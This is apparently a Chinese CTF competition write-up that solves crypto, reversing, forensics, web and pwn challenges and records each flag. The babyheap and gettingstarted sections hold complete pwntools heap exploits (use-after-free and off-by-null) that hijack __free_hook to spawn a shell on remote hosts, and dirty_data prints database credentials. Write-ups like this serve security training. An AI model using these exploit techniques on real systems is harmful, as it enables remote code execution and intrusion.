
Sqldata
打开附件,发现是SQL注入流量,最后三个流量读取了flag


去除冗余数据,base32解码即可得到flag

其他两段同理


得到flag
flag{a0d78ce4-8072-4e14-939b-cd78392a34f4}
orsa
RSA解密,p^q利用剪枝算法来反求出pq的具体值
import sys
def search_pq(p, q):
l = len(p)
data = 1024
tmp0 = p + (data - l) * "0"
tmp1 = p + (data - l) * "1"
tmq0 = q + (data - l) * "0"
tmq1 = q + (data - l) * "1"
if (int(tmp0, 2) < int(tmq0, 2)):
return
if (int(tmp0, 2) * int(tmq0, 2) > n):
return
elif (int(tmp1, 2) * int(tmq1, 2) < n):
return
if (l == 1024):
pp = int(tmp0, 2)
qq = int(tmq0, 2)
print(pp)
print(qq)
else:
if (a1[l] == "1"):
search_pq(p + "1", q + "0")
search_pq(p + "0", q + "1")
else:
search_pq(p + "0", q + "0")
search_pq(p + "1", q + "1")
n = 17626392212279375795672017937809976432819563702015014286064950438576962829301599887424832742209378051687822421703316130192020970941676594734073337248659576926575409659609517516571173738767919910420753227081676651612998092451924002173008602428197941864705971469948068681614565308570894501692597579202715649837935866803849514492857112054684416002104812289864567355883456430042148145799939586951625034025707736407538180102611049391900268512837878848560854682228074168583637013599117615137668041018375469762511166636852906124939919673060420023287056647653925858064479788117341253962554259945839612998710315288660915390543
pq = 89884656743115795386465259394234594567546130199363180708002290807487206865805972417279697354950018128772500146302322028511803484668179089220615193364070482772703954931838536681720469410883560665407216805250546708783249336389502139655454481491246187888957907623426449041503701395627092371546762192998918782974
c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427
e = 65537
sys.setrecursionlimit(1500)
a1 = "0" + str(bin(pq)[2:])
p = "1"
q = "1"
search_pq(p, q)
得到p和q
p=158320041595963346910607953497511695075001758433674691713888017753105291655382379900703870377303844238937087600854108033755563228292880298246860058356388698143578740680103975150537695645088531644826282534286488017240804391039495063039781633438590238645412596002890423433811285116929743283890906195989612887623
q=111333928633384039248787825266058380102564302610683774296735138323796885440325522301302649130522397716710525859927661834447462648801231320790381330762200244351951324675928016721869115489370317719639192101136412298885878342628245496531456558511102222180443848548963347176474520255844896524252794434180745626041
然后正常RSA解密即可得到flag
from Crypto.Util.number import *
p=158320041595963346910607953497511695075001758433674691713888017753105291655382379900703870377303844238937087600854108033755563228292880298246860058356388698143578740680103975150537695645088531644826282534286488017240804391039495063039781633438590238645412596002890423433811285116929743283890906195989612887623
q=111333928633384039248787825266058380102564302610683774296735138323796885440325522301302649130522397716710525859927661834447462648801231320790381330762200244351951324675928016721869115489370317719639192101136412298885878342628245496531456558511102222180443848548963347176474520255844896524252794434180745626041
e=65537
c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427
n=p*q
phi=(p - 1) * (q - 1)
d = inverse(e, phi)
m = long_to_bytes(pow(c, d, n))
print(m)

flag{2c50b32a-fe84-4f1f-a645-22dcc4caa9b9}
0x100
nc得到源码

发现flag部分数据丢失,利用明文m的高位攻击来恢复
同时需要res = f.small_roots(X = 256^i,beta=0.48)
脚本如下
from Crypto.Util.number import *
from gmpy2 import *
c = 33555838736521638336508564179240154875721919208162692653621849617985366203999316090924212552099132840976315135821908280824203158812899702896949214723368112127500471190187443464058193634562219092511168113924749082876766345406995267519131355826704095496960006139716868408593517285137109832742755581112433110173
n = 74224694190378245570662914514197080111808324634781677418701441263524880254209023098028414752153116247558921852342579052620848368822288495663953364161190265839271585860352129564216547402136600849476321773029405114130903399735699724437227139229796496995834686374625593947966539751536221128712735603857178093087
e = 3
for i in range(100):
R = PolynomialRing(Zmod(n), 'x')
x = R.gen()
dm = b"flag{" + b"\x00" * i + b"}"
pad = b"\x00" * (114514 - len(dm))
mhigh = bytes_to_long(dm + pad)
f = (mhigh + x * 256 ** (len(pad) + 1)) ** e - c
f = f.monic()
res = f.small_roots(X=256**i, beta=0.48)
print(res)
if res:
flag = mhigh + int(res[0]) * 256 ** (len(pad) + 1)
print(long_to_bytes(int(flag))[:43])

得到flag
flag{8de8cc07-2ca0-48fd-a13e-1ac1d0b38743}
babyheap

存在UAF漏洞
from pwn import *
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context(os='linux', arch='amd64', log_level='debug')
p = remote('8.147.132.99', 21800)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
# Initial allocations
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "0")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "1")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "555")
p.sendlineafter("find me\n", "1024")
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "2")
p.sendlineafter("size: ", "96")
# Freeing chunks
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "1")
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "0")
# Corrupting freed chunk
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "0")
p.send(b'\n')
# Allocating more chunks
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "3")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "4")
p.sendlineafter("size: ", "96")
# Overwriting next chunk's header
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "4")
p.send(p64(0) + p64(0x481) + b'\n')
# Free chunk to merge into top chunk
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "1")
# Leak libc address
p.sendlineafter(">> \n", "4")
p.sendlineafter("index: \n", "1")
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
li(hex(libc_base))
# Calculate necessary addresses
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))
# Freeing and corrupting chunks to overwrite free_hook
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "5")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "2")
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "5")
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "4")
p.send(p64(0) + p64(0x71) + p64(free_hook) + b'\n')
# Write system address and "/bin/sh" string to chunks
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "6")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "6")
p.send(b'/bin/sh\x00\n')
p.sendlineafter(">> \n", "1")
p.sendlineafter("index: \n", "7")
p.sendlineafter("size: ", "96")
p.sendlineafter(">> \n", "3")
p.sendlineafter("index: \n", "7")
p.send(p64(system_addr) + b'\n')
# Trigger exploit
p.sendlineafter(">> \n", "2")
p.sendlineafter("index: \n", "6")
p.interactive()

得到flag
flag{5dd4ce7c-da45-434f-be5b-32028500cae9}
backleak
源码泄露,dirsearch扫目录

访问得到提示,vi.php

恢复文件
vim -r index.php.swp
得到源码
<!DOCTYPE html>
<html>
<head>
<title>backleak</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf8">
<style>
body {
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
height: 100vh;
margin: 0;
background: linear-gradient(to bottom left, #fff, #f8f9fa);
font-family: 'Helvetica Neue', Arial, sans-serif;
color: #343a40;
}
img {
width: 300px;
height: 300px;
border-radius: 50%;
box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
}
h1 {
font-size: 2em;
text-shadow: none;
color: #212529;
width: 60%;
word-wrap: break-word;
}
</style>
</head>
<body>
<h1>你知道^M是什么吗?在哪里经常见过呢?</h1>
</body>
<!-- vi.php -->
</html>
访问vi.php,post传参flag=ok,即可得到flag

得到flag
flag{a72b0871-46cc-44b4-a3ab-9559b0ae0370}
gettingstarted

存在OFF BY NULL漏洞
from pwn import *
from ctypes import *
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context(os='linux', arch='amd64', log_level='debug')
p = remote('8.147.131.4', 25825)
elf = ELF('./easy')
libc = cdll.LoadLibrary('./libc-2.27.so')
seed = libc.time(0)
libc.srand(seed)
a = [libc.rand() % 80 + 32 for _ in range(7)]
p.sendlineafter("please login >>>>\n", bytes(a))
for i in range(10):
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", str(i))
p.sendlineafter("Size ", "144")
for i in range(7):
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", str(i))
p.sendlineafter(":", "3")
p.sendlineafter("Index: ", "7")
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x3ebd30
li(hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system_addr, bin_sh = libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
for i in range(10):
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", str(i + 10))
p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "17")
p.sendlineafter("Content: ", b'a' * 104 + p8(0xe1))
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "18")
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "19")
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "18")
p.sendlineafter("Size ", "216")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "18")
p.sendlineafter("Content: ", b'a' * 104 + p64(0x71) + p64(free_hook) + b'\n')
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "27")
p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "27")
p.sendlineafter("Content: ", b'/bin/sh\x00\n')
p.sendlineafter(":", "1")
p.sendlineafter("Index: ", "28")
p.sendlineafter("Size ", "104")
p.sendlineafter(":", "2")
p.sendlineafter("Index: ", "28")
p.sendlineafter("Content: ", p64(system_addr) + b'\n')
p.sendlineafter(":", "4")
p.sendlineafter("Index: ", "27")
p.interactive()

flag{e9dc7427-af2d-4d62-8d8c-cc3656de5a2c}
dirty_data
连接SSH之后发现html下存在源码服务

找到mysql账密
mysql_connect(‘localhost’,‘ctf’,‘ctf123’);
连接之后发现存在一串字段是冗余的

删除第四段数据即可
delete from news where id=4;

稍等一会,即可读取flag

flag{655eba17-be43-4142-9630-9562065bb43b}
LFSR
Lfsr加密,ida反编译可以看到加密逻辑

跟进lfsr_cipher函数


逆向一下即可,脚本如下
v5=[0x16,0x54,0x0FD,0x29,0x5C,0x23,0x0EA,0x0A1,0x56,0x0D7,0x3D,0x49,0x72,0x0A6,0x0F5,0x53,0x0D0,0x0E9,0x41,0x82,0x0ED,0x0D4,0x42,0x16,0x0FC,0x2F,0x9F,0x0B7,0x44,0x51,0x2B,0x3C,0x0E5,0x0F6,0x5,0x89,0x0ED,0x0DE,0x44,0x0DE,0x0BE,0x93]
flag=''
v6 = 44257
v7 = v6
a1 = v7
# print(len(v5))
for i in range(42):
v2 = a1 & 1
#print(v2,end="")
a1 >>= 1
if (v2):
a1 ^= 46080
# print(a1,end=" ")
flag+=chr(((v5[i])^a1) & 0xff)
print(flag)
得到flag

flag{0ce4feed-01a1-4694-aa8d-e11c5d9522ec}
Ezmaze
迷宫题,有upx壳

改UPX特征然后脱壳,UPX应该都是大写才对


脱壳之后反编译,查看主体逻辑发现地图
101101
101001
100101
110101
100001
111111
分析代码发现移动按键
wz=[10^0x32,0^0x32,6^0x32,94^0x32]
for i in range(4):
print(chr(wz[i]),end=" ")

走出地图
22l22ll8888

md5即为flag
from hashlib import md5
data="22l22ll8888"
print("flag{"+md5(bytes(data,'utf-8')).hexdigest()+"}")

flag{c534af59b12444af2cefebd25f0efca4}